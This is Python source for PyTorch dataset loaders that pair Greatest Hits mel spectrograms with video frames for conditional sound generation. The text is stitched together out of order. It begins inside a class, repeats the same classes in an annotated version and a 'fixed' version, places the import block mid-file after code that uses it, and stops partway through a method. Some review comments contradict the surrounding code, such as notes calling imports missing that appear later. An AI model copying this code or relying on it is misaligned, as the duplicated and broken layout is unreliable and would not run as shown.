    def __init__(self, specs_dataset_cfg):
        super().__init__('valid', **specs_dataset_cfg)
class GreatestHitSpecsTest(GreatestHitSpecs):
    """Test-split wrapper: forwards the config dict to GreatestHitSpecs."""
    def __init__(self, specs_dataset_cfg):
        super().__init__('test', **specs_dataset_cfg)
class CondGreatestHitSpecsCondOnImage(torch.utils.data.Dataset):
    """Greatest Hits dataset for conditional spectrogram generation.

    Each item pairs a target clip (mel spectrogram + RGB frames) with a
    conditioning clip: another hit of the same video, or — with probability
    `p_outside_cond` — a hit from a different video.
    """
    def __init__(self, split, specs_dir, spec_len, feat_len, feat_depth, feat_crop_len, random_crop, mel_num, spec_crop_len,
                 vqgan_L=10.0, L=1.0, rand_shift=False, spec_transforms=None, frame_transforms=None, splits_path='./data',
                 meta_path='./data/info_r2plus1d_dim1024_15fps.json', frame_path='data/greatesthit/greatesthit_processed',
                 p_outside_cond=0., p_audio_aug=0.5):
        super().__init__()
        self.split = split
        self.specs_dir = specs_dir
        self.spec_transforms = spec_transforms
        self.frame_transforms = frame_transforms
        self.splits_path = splits_path
        self.meta_path = meta_path
        self.frame_path = frame_path
        self.feat_len = feat_len
        self.feat_depth = feat_depth
        self.feat_crop_len = feat_crop_len
        self.spec_len = spec_len
        self.rand_shift = rand_shift
        self.L = L
        # 860 mel frames span 10 s; keep a multiple of 32 covering vqgan_L seconds, capped at 860.
        # NOTE(review): needs `import math` at file level — missing from the visible imports.
        self.spec_take_first = int(math.ceil(860 * (vqgan_L / 10.) / 32) * 32)
        self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
        self.p_outside_cond = torch.tensor(p_outside_cond)
        # Metadata json holds parallel lists: video_name, start_idx (audio samples), hit_type.
        greatesthit_meta = json.load(open(self.meta_path, 'r'))
        unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
        self.label2target = {label: target for target, label in enumerate(unique_classes)}
        self.target2label = {target: label for label, target in self.label2target.items()}
        # 'video_startidx' -> hit-type label
        self.video_idx2label = {
            get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
            greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
        }
        self.available_video_hit = list(self.video_idx2label.keys())
        # 'video_startidx' -> path to its denoised mel .npy
        self.video_idx2path = {
            vh: os.path.join(self.specs_dir,
                vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
            for vh in self.available_video_hit
        }
        for value in self.video_idx2path.values():
            assert os.path.exists(value)
        # 'video_startidx' -> row index in the metadata lists
        self.video_idx2idx = {
            get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
            i for i in range(len(greatesthit_meta['video_name']))
        }
        split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
        if not os.path.exists(split_clip_ids_path):
            # NOTE(review): make_split_files() reads self.video2indexes, which is only
            # built further down — this call path raises AttributeError.
            self.make_split_files()
        clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
        self.dataset = clip_video_hit
        spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
        self.spec_transforms = transforms.Compose([
            CropImage([mel_num, spec_crop_len], random_crop),
            transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=p_audio_aug),
            transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=p_audio_aug)
        ])
        if self.frame_transforms == None:  # NOTE(review): prefer `is None`
            self.frame_transforms = transforms.Compose([
                Resize3D(128),
                RandomResizedCrop3D(112, scale=(0.5, 1.0)),
                RandomHorizontalFlip3D(),
                ColorJitter3D(brightness=0.1, saturation=0.1),
                ToTensor3D(),
                # ImageNet normalization statistics.
                Normalize3D(mean=[0.485, 0.456, 0.406],
                            std=[0.229, 0.224, 0.225]),
            ])
        # Group hit start indices by video.
        self.video2indexes = {}
        for video_idx in self.dataset:
            video, start_idx = video_idx.split('_')
            if video not in self.video2indexes.keys():
                self.video2indexes[video] = []
            self.video2indexes[video].append(start_idx)
        # Drop clips that are the only hit of their video (no conditioning pair exists).
        for video in self.video2indexes.keys():
            if len(self.video2indexes[video]) == 1:  # given video contains only one hit
                self.dataset.remove(
                    get_GH_data_identifier(video, self.video2indexes[video][0])
                )
        # Per-class clip counts (e.g. for balancing).
        clip_classes = [self.label2target[self.video_idx2label[vh]] for vh in clip_video_hit]
        class2count = collections.Counter(clip_classes)
        self.class_counts = torch.tensor([class2count[cls] for cls in range(len(class2count))])
        if self.L != 1.0:
            print(split, L)
            # Non-default clip length: keep only clips with enough frames on disk.
            self.validate_data()
            # Rebuild the per-video index after validate_data() pruned the dataset.
            self.video2indexes = {}
            for video_idx in self.dataset:
                video, start_idx = video_idx.split('_')
                if video not in self.video2indexes.keys():
                    self.video2indexes[video] = []
                self.video2indexes[video].append(start_idx)

    def __len__(self):
        return len(self.dataset)

    def __getitem__(self, idx):
        """Return target + conditioning spectrograms plus their stacked frames."""
        item = {}
        try:
            video_idx = self.dataset[idx]
            spec_path = self.video_idx2path[video_idx]
            spec = np.load(spec_path) # (80, 860)
            video, start_idx = video_idx.split('_')
            frame_path = os.path.join(self.frame_path, video, 'frames')
            # start_idx is in audio samples; convert to a video frame index.
            start_frame_idx = non_negative(FPS * int(start_idx)/SR)
            end_frame_idx = non_negative(start_frame_idx + FPS * self.L)
            if self.rand_shift:
                # NOTE(review): needs `import random` at file level (only `sample` is imported).
                shift = random.uniform(0, 0.5)
                spec_shift = int(shift * spec.shape[1] // 10)
                # Since only the first second is used
                spec = np.roll(spec, -spec_shift, 1)
                start_frame_idx += int(FPS * shift)
                end_frame_idx += int(FPS * shift)
            # Frames are 1-indexed on disk.
            # NOTE(review): needs `from PIL import Image` at file level.
            frames = [Image.open(os.path.join(
                frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
                range(start_frame_idx, end_frame_idx)]
            # Sample condition
            if torch.all(torch.bernoulli(self.p_outside_cond) == 1.):
                # Sample condition from outside video
                all_idx = set(list(range(len(self.dataset))))
                all_idx.remove(idx)
                # NOTE(review): random.sample() on a set raises TypeError on Python >= 3.11.
                cond_video_idx = self.dataset[sample(all_idx, k=1)[0]]
                cond_video, cond_start_idx = cond_video_idx.split('_')
            else:
                # Condition on another hit of the same video.
                cond_video = video
                video_hits_idx = copy.copy(self.video2indexes[video])
                video_hits_idx.remove(start_idx)
                cond_start_idx = sample(video_hits_idx, k=1)[0]
                cond_video_idx = get_GH_data_identifier(cond_video, cond_start_idx)
            cond_spec_path = self.video_idx2path[cond_video_idx]
            cond_spec = np.load(cond_spec_path) # (80, 860)
            cond_video, cond_start_idx = cond_video_idx.split('_')
            cond_frame_path = os.path.join(self.frame_path, cond_video, 'frames')
            cond_start_frame_idx = non_negative(FPS * int(cond_start_idx)/SR)
            cond_end_frame_idx = non_negative(cond_start_frame_idx + FPS * self.L)
            if self.rand_shift:
                cond_shift = random.uniform(0, 0.5)
                cond_spec_shift = int(cond_shift * cond_spec.shape[1] // 10)
                # Since only the first second is used
                cond_spec = np.roll(cond_spec, -cond_spec_shift, 1)
                cond_start_frame_idx += int(FPS * cond_shift)
                cond_end_frame_idx += int(FPS * cond_shift)
            cond_frames = [Image.open(os.path.join(
                cond_frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
                range(cond_start_frame_idx, cond_end_frame_idx)]
            # concat spec outside dataload
            item['image'] = 2 * spec - 1 # (80, 860)
            item['cond_image'] = 2 * cond_spec - 1 # (80, 860)
            item['image'] = item['image'][:, :self.spec_take_first]
            item['cond_image'] = item['cond_image'][:, :self.spec_take_first]
            item['file_path_specs_'] = spec_path
            item['file_path_cond_specs_'] = cond_spec_path
            if self.frame_transforms is not None:
                cond_frames = self.frame_transforms(cond_frames)
                frames = self.frame_transforms(frames)
            # Conditioning frames first, then target frames.
            item['feature'] = np.stack(cond_frames + frames, axis=0) # (30 * L, 112, 112, 3)
            item['file_path_feats_'] = (frame_path, start_frame_idx)
            item['file_path_cond_feats_'] = (cond_frame_path, cond_start_frame_idx)
            item['label'] = self.video_idx2label[video_idx]
            item['target'] = self.label2target[item['label']]
            if self.spec_transforms is not None:
                item = self.spec_transforms(item)
        except Exception:
            # NOTE(review): this prints the traceback *object*, not the formatted traceback.
            print(sys.exc_info()[2])
            print('!!!!!!!!!!!!!!!!!!!!', video_idx, cond_video_idx)
            print('!!!!!!!!!!!!!!!!!!!!', end_frame_idx, cond_end_frame_idx)
            exit(1)
        return item

    def validate_data(self):
        """Keep only clips whose frame folder holds enough frames for L (+0.6 s margin);
        cache the surviving ids to a per-L json."""
        original_len = len(self.dataset)
        valid_dataset = []
        for video_idx in tqdm(self.dataset):
            video, start_idx = video_idx.split('_')
            frame_path = os.path.join(self.frame_path, video, 'frames')
            start_frame_idx = non_negative(FPS * int(start_idx)/SR)
            end_frame_idx = non_negative(start_frame_idx + FPS * (self.L + 0.6))
            if os.path.exists(os.path.join(frame_path, f'frame{end_frame_idx:0>6d}.jpg')):
                valid_dataset.append(video_idx)
            else:
                self.video2indexes[video].remove(start_idx)
        # NOTE(review): removing from `valid_dataset` while iterating it skips the element
        # that follows each removal — some single-hit clips may survive this pass.
        for video_idx in valid_dataset:
            video, start_idx = video_idx.split('_')
            if len(self.video2indexes[video]) == 1:
                valid_dataset.remove(video_idx)
        if original_len != len(valid_dataset):
            print(f'Validated dataset with enough frames: {len(valid_dataset)}')
        self.dataset = valid_dataset
        split_clip_ids_path = os.path.join(self.splits_path, f'greatesthit_{self.split}_{self.L:.2f}.json')
        if not os.path.exists(split_clip_ids_path):
            with open(split_clip_ids_path, 'w') as f:
                json.dump(valid_dataset, f)

    def make_split_files(self, ratio=[0.85, 0.1, 0.05]):
        """Split *videos* (so clips of one video never cross splits) into
        train/test/valid and write the three json files.

        NOTE(review): uses `random.seed/shuffle` (needs `import random`) and
        self.video2indexes, which does not exist yet when called from __init__.
        """
        random.seed(1337)
        print(f'The split files do not exist @ {self.splits_path}. Calculating the new ones.')
        # The downloaded videos (some went missing on YouTube and no longer available)
        available_mel_paths = set(glob(os.path.join(self.specs_dir, '*_mel.npy')))
        self.available_video_hit = [vh for vh in self.available_video_hit if self.video_idx2path[vh] in available_mel_paths]
        all_video = list(self.video2indexes.keys())
        print(f'The number of clips available after download: {len(self.available_video_hit)}')
        print(f'The number of videos available after download: {len(all_video)}')
        available_idx = list(range(len(all_video)))
        random.shuffle(available_idx)
        assert sum(ratio) == 1.
        cut_train = int(ratio[0] * len(all_video))
        cut_test = cut_train + int(ratio[1] * len(all_video))
        train_idx = available_idx[:cut_train]
        test_idx = available_idx[cut_train:cut_test]
        valid_idx = available_idx[cut_test:]
        train_video = [all_video[i] for i in train_idx]
        test_video = [all_video[i] for i in test_idx]
        valid_video = [all_video[i] for i in valid_idx]
        # Expand each video into its clip identifiers.
        train_video_hit = []
        for v in train_video:
            train_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
        test_video_hit = []
        for v in test_video:
            test_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
        valid_video_hit = []
        for v in valid_video:
            valid_video_hit += [get_GH_data_identifier(v, hit_idx) for hit_idx in self.video2indexes[v]]
        # mix train and valid for better validation loss
        mixed = train_video_hit + valid_video_hit
        random.shuffle(mixed)
        split = int(len(mixed) * ratio[0] / (ratio[0] + ratio[2]))
        train_video_hit = mixed[:split]
        valid_video_hit = mixed[split:]
        with open(os.path.join(self.splits_path, 'greatesthit_train.json'), 'w') as train_file,\
             open(os.path.join(self.splits_path, 'greatesthit_test.json'), 'w') as test_file,\
             open(os.path.join(self.splits_path, 'greatesthit_valid.json'), 'w') as valid_file:
            json.dump(train_video_hit, train_file)
            json.dump(test_video_hit, test_file)
            json.dump(valid_video_hit, valid_file)
        print(f'Put {len(train_idx)} clips to the train set and saved it to ./data/greatesthit_train.json')
        print(f'Put {len(test_idx)} clips to the test set and saved it to ./data/greatesthit_test.json')
        print(f'Put {len(valid_idx)} clips to the valid set and saved it to ./data/greatesthit_valid.json')
class CondGreatestHitSpecsCondOnImageTrain(CondGreatestHitSpecsCondOnImage):
    """Train split: random resized crop / horizontal flip / color-jitter frame augmentation."""
    def __init__(self, dataset_cfg):
        train_transforms = transforms.Compose([
            Resize3D(128),
            RandomResizedCrop3D(112, scale=(0.5, 1.0)),
            RandomHorizontalFlip3D(),
            ColorJitter3D(brightness=0.1, saturation=0.1),
            ToTensor3D(),
            # ImageNet normalization statistics.
            Normalize3D(mean=[0.485, 0.456, 0.406],
                        std=[0.229, 0.224, 0.225]),
        ])
        super().__init__('train', frame_transforms=train_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageValidation(CondGreatestHitSpecsCondOnImage):
    """Validation split: deterministic center-crop frame preprocessing."""
    def __init__(self, dataset_cfg):
        valid_transforms = transforms.Compose([
            Resize3D(128),
            CenterCrop3D(112),
            ToTensor3D(),
            # ImageNet normalization statistics.
            Normalize3D(mean=[0.485, 0.456, 0.406],
                        std=[0.229, 0.224, 0.225]),
        ])
        super().__init__('valid', frame_transforms=valid_transforms, **dataset_cfg)
class CondGreatestHitSpecsCondOnImageTest(CondGreatestHitSpecsCondOnImage):
    """Test split: deterministic center-crop frame preprocessing."""
    def __init__(self, dataset_cfg):
        test_transforms = transforms.Compose([
            Resize3D(128),
            CenterCrop3D(112),
            ToTensor3D(),
            # ImageNet normalization statistics.
            Normalize3D(mean=[0.485, 0.456, 0.406],
                        std=[0.229, 0.224, 0.225]),
        ])
        super().__init__('test', frame_transforms=test_transforms, **dataset_cfg)
if __name__ == '__main__':
    # Smoke test: build the data module from the experiment config and print
    # the number of training clips.
    import sys
    from omegaconf import OmegaConf
    cfg = OmegaConf.load('configs/greatesthit_transformer_with_vNet_randshift_2s_outside_video.yaml')
    data = instantiate_from_config(cfg.data)
    data.prepare_data()
    data.setup()
    print(len(data.datasets['train']))
    # print(data.datasets['train'][24])
    # print(data.datasets['validation'][24])
    # print(data.datasets['test'][24])
    # print(data.datasets['train'][24]['feature'].shape)
# Standard library.
import collections
import copy
import json
import logging
import math      # added: math.ceil is used when computing spec_take_first
import os
import random    # added: random.uniform/seed/shuffle are used below
import sys
from glob import glob
from random import sample

# Third party.
import albumentations
import numpy as np
import torch
import torchaudio
from PIL import Image  # added: Image.open is used to load frames
from torchvision import transforms
from tqdm import tqdm

# Project local (needs the repo root on sys.path).
sys.path.insert(0, '.')  # nopep8
from train import instantiate_from_config
from specvqgan.data.transforms import *
torchaudio.set_audio_backend("sox_io")
logger = logging.getLogger(f'main.{__name__}')

SR = 22050  # audio sample rate (Hz); metadata start_idx values are in samples
FPS = 15  # video frame rate used to map sample indices to frame indices
MAX_SAMPLE_ITER = 10  # NOTE(review): not referenced anywhere in the visible code
def non_negative(x):
    """Round *x* to the nearest integer, clamping negative inputs to 0."""
    clamped = max(0, x)
    return int(np.round(clamped, 0))
def get_GH_data_identifier(video_name, start_idx, split='_'):
    """Join a video name and a hit start index into a single id, e.g. 'vid_123'.

    `start_idx` may be a str or an int; anything else raises NotImplementedError.
    """
    if not isinstance(start_idx, (str, int)):
        raise NotImplementedError
    return f'{video_name}{split}{start_idx}'
class Crop(object):
    """Crop the 'image' entry (and 'cond_image', if present) of an item dict.

    With ``cropped_shape=(mel_num, spec_len)`` an albumentations Random/Center
    crop is applied; with ``cropped_shape=None`` items pass through unchanged.
    """

    def __init__(self, cropped_shape=None, random_crop=False):
        self.cropped_shape = cropped_shape
        if cropped_shape is None:
            # Identity preprocessor: hand the kwargs straight back.
            self.preprocessor = lambda **kwargs: kwargs
        else:
            height, width = cropped_shape
            cropper_cls = albumentations.RandomCrop if random_crop else albumentations.CenterCrop
            self.cropper = cropper_cls
            self.preprocessor = albumentations.Compose([cropper_cls(height, width)])

    def __call__(self, item):
        item['image'] = self.preprocessor(image=item['image'])['image']
        if 'cond_image' in item.keys():
            item['cond_image'] = self.preprocessor(image=item['cond_image'])['image']
        return item
class CropImage(Crop):
    """Crop applied to item['image'] / item['cond_image'] — see Crop."""
    def __init__(self, *crop_args):
        super().__init__(*crop_args)
class CropFeats(Crop):
    """Same cropping, but applied to item['feature'] instead of 'image'."""
    def __init__(self, *crop_args):
        super().__init__(*crop_args)
    def __call__(self, item):
        item['feature'] = self.preprocessor(image=item['feature'])['image']
        return item
class CropCoords(Crop):
    """Same cropping, but applied to item['coord'] instead of 'image'."""
    def __init__(self, *crop_args):
        super().__init__(*crop_args)
    def __call__(self, item):
        item['coord'] = self.preprocessor(image=item['coord'])['image']
        return item
class ResampleFrames(object):
    """Subsample an item's 'feature' array (frames along axis 0) to a fixed count.

    Picks ``feat_sample_size`` evenly spaced frame indices shifted toward the
    centre of each interval, optionally repeating every chosen index
    ``times_to_repeat_after_resample`` times.
    """

    def __init__(self, feat_sample_size, times_to_repeat_after_resample=None):
        self.feat_sample_size = feat_sample_size
        self.times_to_repeat_after_resample = times_to_repeat_after_resample

    def __call__(self, item):
        feat_len = item['feature'].shape[0]

        ## resample
        assert feat_len >= self.feat_sample_size
        # evenly spaced points (abcdefghkl -> aoooofoooo)
        # Fixed: `dtype=np.int` — the alias was removed in NumPy 1.24 and raised
        # AttributeError; the builtin `int` is the documented replacement.
        idx = np.linspace(0, feat_len, self.feat_sample_size, dtype=int, endpoint=False)
        # xoooo xoooo -> ooxoo ooxoo
        shift = feat_len // (self.feat_sample_size + 1)
        idx = idx + shift

        ## repeat after resampling (abc -> aaaabbbbcccc)
        if self.times_to_repeat_after_resample is not None and self.times_to_repeat_after_resample > 1:
            idx = np.repeat(idx, self.times_to_repeat_after_resample)

        item['feature'] = item['feature'][idx, :]
        return item
class GreatestHitSpecs(torch.utils.data.Dataset):
    """Greatest Hits mel-spectrogram dataset (unconditional variant).

    Loads pre-computed (80 x 860) mel spectrograms listed in a split json and
    exposes each hit as an item with image / label / target fields.
    """
    def __init__(self, split, spec_dir_path, spec_len, random_crop, mel_num,
                 spec_crop_len, L=2.0, rand_shift=False, spec_transforms=None, splits_path='./data',
                 meta_path='./data/info_r2plus1d_dim1024_15fps.json'):
        super().__init__()
        self.split = split
        self.specs_dir = spec_dir_path
        self.spec_transforms = spec_transforms
        self.splits_path = splits_path
        self.meta_path = meta_path
        self.spec_len = spec_len
        self.rand_shift = rand_shift
        self.L = L
        # 860 mel frames span 10 s; round the L-second portion up to a multiple of 32, capped at 860.
        # NOTE(review): needs `import math` at file level — missing from the visible imports.
        self.spec_take_first = int(math.ceil(860 * (L / 10.) / 32) * 32)
        self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
        # Metadata json holds parallel lists: video_name, start_idx (audio samples), hit_type.
        greatesthit_meta = json.load(open(self.meta_path, 'r'))
        unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
        self.label2target = {label: target for target, label in enumerate(unique_classes)}
        self.target2label = {target: label for label, target in self.label2target.items()}
        # 'video_startidx' -> hit-type label
        self.video_idx2label = {
            get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
            greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
        }
        self.available_video_hit = list(self.video_idx2label.keys())
        # 'video_startidx' -> path to its denoised mel .npy
        self.video_idx2path = {
            vh: os.path.join(self.specs_dir,
                vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') +'_mel.npy')
            for vh in self.available_video_hit
        }
        # 'video_startidx' -> row index in the metadata lists
        self.video_idx2idx = {
            get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
            i for i in range(len(greatesthit_meta['video_name']))
        }
        # Unlike the conditional dataset, this class cannot create split files itself.
        split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
        if not os.path.exists(split_clip_ids_path):
            raise NotImplementedError()
        clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
        self.dataset = clip_video_hit
        spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
        # p=0: the masking augmentations are effectively disabled here.
        self.spec_transforms = transforms.Compose([
            CropImage([mel_num, spec_crop_len], random_crop),
            transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=0),
            transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=0)
        ])
        # Group hit start indices by video.
        self.video2indexes = {}
        for video_idx in self.dataset:
            video, start_idx = video_idx.split('_')
            if video not in self.video2indexes.keys():
                self.video2indexes[video] = []
            self.video2indexes[video].append(start_idx)
        # Drop clips that are the only hit of their video.
        for video in self.video2indexes.keys():
            if len(self.video2indexes[video]) == 1:  # given video contains only one hit
                self.dataset.remove(
                    get_GH_data_identifier(video, self.video2indexes[video][0])
                )

    def __len__(self):
        # Number of usable clips in this split.
        return len(self.dataset)

    def __getitem__(self, idx):
        """Return dict with 'image' ([-1, 1] spectrogram cut to spec_take_first),
        'file_path', class 'label' and integer 'target'."""
        item = {}
        video_idx = self.dataset[idx]
        spec_path = self.video_idx2path[video_idx]
        spec = np.load(spec_path) # (80, 860)
        if self.rand_shift:
            # NOTE(review): needs `import random` at file level (only `sample` is imported).
            shift = random.uniform(0, 0.5)
            spec_shift = int(shift * spec.shape[1] // 10)
            # Since only the first second is used
            spec = np.roll(spec, -spec_shift, 1)
        # concat spec outside dataload
        item['image'] = 2 * spec - 1 # (80, 860)
        item['image'] = item['image'][:, :self.spec_take_first]
        item['file_path'] = spec_path
        item['label'] = self.video_idx2label[video_idx]
        item['target'] = self.label2target[item['label']]
        if self.spec_transforms is not None:
            item = self.spec_transforms(item)
        return item
class GreatestHitSpecsTrain(GreatestHitSpecs):
    """Train-split wrapper: forwards the config dict to GreatestHitSpecs."""
    def __init__(self, specs_dataset_cfg):
        super().__init__('train', **specs_dataset_cfg)
class GreatestHitSpecsValidation(GreatestHitSpecs):
    """Validation-split wrapper: forwards the config dict to GreatestHitSpecs."""
    def __init__(self, specs_dataset_cfg):
        super().__init__('valid', **specs_dataset_cfg)
class GreatestHitSpecsTest(GreatestHitSpecs):
    """Test-split wrapper: forwards the config dict to GreatestHitSpecs."""
    def __init__(self, specs_dataset_cfg):
        super().__init__('test', **specs_dataset_cfg)
class CondGreatestHitSpecsCondOnImage(torch.utils.data.Dataset):
    """Greatest Hits dataset for conditional spectrogram generation.

    Each item pairs a target clip (mel spectrogram + RGB frames) with a
    conditioning clip: another hit of the same video, or — with probability
    ``p_outside_cond`` — a hit from a different video.

    Fixes vs the original:
      * ``random.sample`` was called on a ``set`` (TypeError on Python >= 3.11);
      * ``validate_data`` removed items from a list while iterating it;
      * ``make_split_files`` read ``self.video2indexes`` before __init__ built it;
      * ``== None`` comparison; useless ``sys.exc_info()[2]`` print.
    """

    def __init__(self, split, specs_dir, spec_len, feat_len, feat_depth, feat_crop_len, random_crop, mel_num, spec_crop_len,
                 vqgan_L=10.0, L=1.0, rand_shift=False, spec_transforms=None, frame_transforms=None, splits_path='./data',
                 meta_path='./data/info_r2plus1d_dim1024_15fps.json', frame_path='data/greatesthit/greatesthit_processed',
                 p_outside_cond=0., p_audio_aug=0.5):
        super().__init__()
        self.split = split
        self.specs_dir = specs_dir
        self.spec_transforms = spec_transforms
        self.frame_transforms = frame_transforms
        self.splits_path = splits_path
        self.meta_path = meta_path
        self.frame_path = frame_path
        self.feat_len = feat_len
        self.feat_depth = feat_depth
        self.feat_crop_len = feat_crop_len
        self.spec_len = spec_len
        self.rand_shift = rand_shift
        self.L = L
        # 860 mel frames span 10 s; keep a multiple of 32 covering vqgan_L seconds, capped at 860.
        self.spec_take_first = int(math.ceil(860 * (vqgan_L / 10.) / 32) * 32)
        self.spec_take_first = 860 if self.spec_take_first > 860 else self.spec_take_first
        self.p_outside_cond = torch.tensor(p_outside_cond)

        # Metadata json holds parallel lists: video_name, start_idx (audio samples), hit_type.
        greatesthit_meta = json.load(open(self.meta_path, 'r'))
        unique_classes = sorted(list(set(ht for ht in greatesthit_meta['hit_type'])))
        self.label2target = {label: target for target, label in enumerate(unique_classes)}
        self.target2label = {target: label for label, target in self.label2target.items()}
        # 'video_startidx' -> hit-type label
        self.video_idx2label = {
            get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
            greatesthit_meta['hit_type'][i] for i in range(len(greatesthit_meta['video_name']))
        }
        self.available_video_hit = list(self.video_idx2label.keys())
        # 'video_startidx' -> path to its denoised mel .npy
        self.video_idx2path = {
            vh: os.path.join(self.specs_dir,
                vh.replace('_', '_denoised_') + '_' + self.video_idx2label[vh].replace(' ', '_') + '_mel.npy')
            for vh in self.available_video_hit
        }
        for value in self.video_idx2path.values():
            assert os.path.exists(value)
        # 'video_startidx' -> row index in the metadata lists
        self.video_idx2idx = {
            get_GH_data_identifier(greatesthit_meta['video_name'][i], greatesthit_meta['start_idx'][i]):
            i for i in range(len(greatesthit_meta['video_name']))
        }

        split_clip_ids_path = os.path.join(splits_path, f'greatesthit_{split}.json')
        if not os.path.exists(split_clip_ids_path):
            self.make_split_files()
        clip_video_hit = json.load(open(split_clip_ids_path, 'r'))
        self.dataset = clip_video_hit

        spec_crop_len = self.spec_take_first if self.spec_take_first <= spec_crop_len else spec_crop_len
        self.spec_transforms = transforms.Compose([
            CropImage([mel_num, spec_crop_len], random_crop),
            transforms.RandomApply([FrequencyMasking(freq_mask_param=20)], p=p_audio_aug),
            transforms.RandomApply([TimeMasking(time_mask_param=int(32 * self.L))], p=p_audio_aug)
        ])
        if self.frame_transforms is None:  # fixed: was `== None`
            self.frame_transforms = transforms.Compose([
                Resize3D(128),
                RandomResizedCrop3D(112, scale=(0.5, 1.0)),
                RandomHorizontalFlip3D(),
                ColorJitter3D(brightness=0.1, saturation=0.1),
                ToTensor3D(),
                # ImageNet normalization statistics.
                Normalize3D(mean=[0.485, 0.456, 0.406],
                            std=[0.229, 0.224, 0.225]),
            ])

        # Group hit start indices by video.
        self.video2indexes = {}
        for video_idx in self.dataset:
            video, start_idx = video_idx.split('_')
            if video not in self.video2indexes.keys():
                self.video2indexes[video] = []
            self.video2indexes[video].append(start_idx)
        # Drop clips that are the only hit of their video (no conditioning pair exists).
        for video in self.video2indexes.keys():
            if len(self.video2indexes[video]) == 1:  # given video contains only one hit
                self.dataset.remove(
                    get_GH_data_identifier(video, self.video2indexes[video][0])
                )

        # Per-class clip counts (e.g. for balancing).
        clip_classes = [self.label2target[self.video_idx2label[vh]] for vh in clip_video_hit]
        class2count = collections.Counter(clip_classes)
        self.class_counts = torch.tensor([class2count[cls] for cls in range(len(class2count))])
        if self.L != 1.0:
            print(split, L)
            # Non-default clip length: keep only clips with enough frames on disk.
            self.validate_data()
            # Rebuild the per-video index after validate_data() pruned the dataset.
            self.video2indexes = {}
            for video_idx in self.dataset:
                video, start_idx = video_idx.split('_')
                if video not in self.video2indexes.keys():
                    self.video2indexes[video] = []
                self.video2indexes[video].append(start_idx)

    def __len__(self):
        return len(self.dataset)

    def __getitem__(self, idx):
        """Return target + conditioning spectrograms plus their stacked frames."""
        item = {}
        try:
            video_idx = self.dataset[idx]
            spec_path = self.video_idx2path[video_idx]
            spec = np.load(spec_path) # (80, 860)
            video, start_idx = video_idx.split('_')
            frame_path = os.path.join(self.frame_path, video, 'frames')
            # start_idx is in audio samples; convert to a video frame index.
            start_frame_idx = non_negative(FPS * int(start_idx)/SR)
            end_frame_idx = non_negative(start_frame_idx + FPS * self.L)
            if self.rand_shift:
                shift = random.uniform(0, 0.5)
                spec_shift = int(shift * spec.shape[1] // 10)
                # Since only the first second is used
                spec = np.roll(spec, -spec_shift, 1)
                start_frame_idx += int(FPS * shift)
                end_frame_idx += int(FPS * shift)
            # Frames are 1-indexed on disk.
            frames = [Image.open(os.path.join(
                frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
                range(start_frame_idx, end_frame_idx)]
            # Sample condition
            if torch.all(torch.bernoulli(self.p_outside_cond) == 1.):
                # Sample condition from outside video
                all_idx = set(list(range(len(self.dataset))))
                all_idx.remove(idx)
                # Fixed: random.sample() requires a sequence (TypeError on a set
                # since Python 3.11); sorted() also keeps the draw deterministic
                # for a given RNG state.
                cond_video_idx = self.dataset[sample(sorted(all_idx), k=1)[0]]
                cond_video, cond_start_idx = cond_video_idx.split('_')
            else:
                # Condition on another hit of the same video.
                cond_video = video
                video_hits_idx = copy.copy(self.video2indexes[video])
                video_hits_idx.remove(start_idx)
                cond_start_idx = sample(video_hits_idx, k=1)[0]
                cond_video_idx = get_GH_data_identifier(cond_video, cond_start_idx)
            cond_spec_path = self.video_idx2path[cond_video_idx]
            cond_spec = np.load(cond_spec_path) # (80, 860)
            cond_video, cond_start_idx = cond_video_idx.split('_')
            cond_frame_path = os.path.join(self.frame_path, cond_video, 'frames')
            cond_start_frame_idx = non_negative(FPS * int(cond_start_idx)/SR)
            cond_end_frame_idx = non_negative(cond_start_frame_idx + FPS * self.L)
            if self.rand_shift:
                cond_shift = random.uniform(0, 0.5)
                cond_spec_shift = int(cond_shift * cond_spec.shape[1] // 10)
                # Since only the first second is used
                cond_spec = np.roll(cond_spec, -cond_spec_shift, 1)
                cond_start_frame_idx += int(FPS * cond_shift)
                cond_end_frame_idx += int(FPS * cond_shift)
            cond_frames = [Image.open(os.path.join(
                cond_frame_path, f'frame{i+1:0>6d}.jpg')).convert('RGB') for i in
                range(cond_start_frame_idx, cond_end_frame_idx)]
            # concat spec outside dataload
            item['image'] = 2 * spec - 1 # (80, 860)
            item['cond_image'] = 2 * cond_spec - 1 # (80, 860)
            item['image'] = item['image'][:, :self.spec_take_first]
            item['cond_image'] = item['cond_image'][:, :self.spec_take_first]
            item['file_path_specs_'] = spec_path
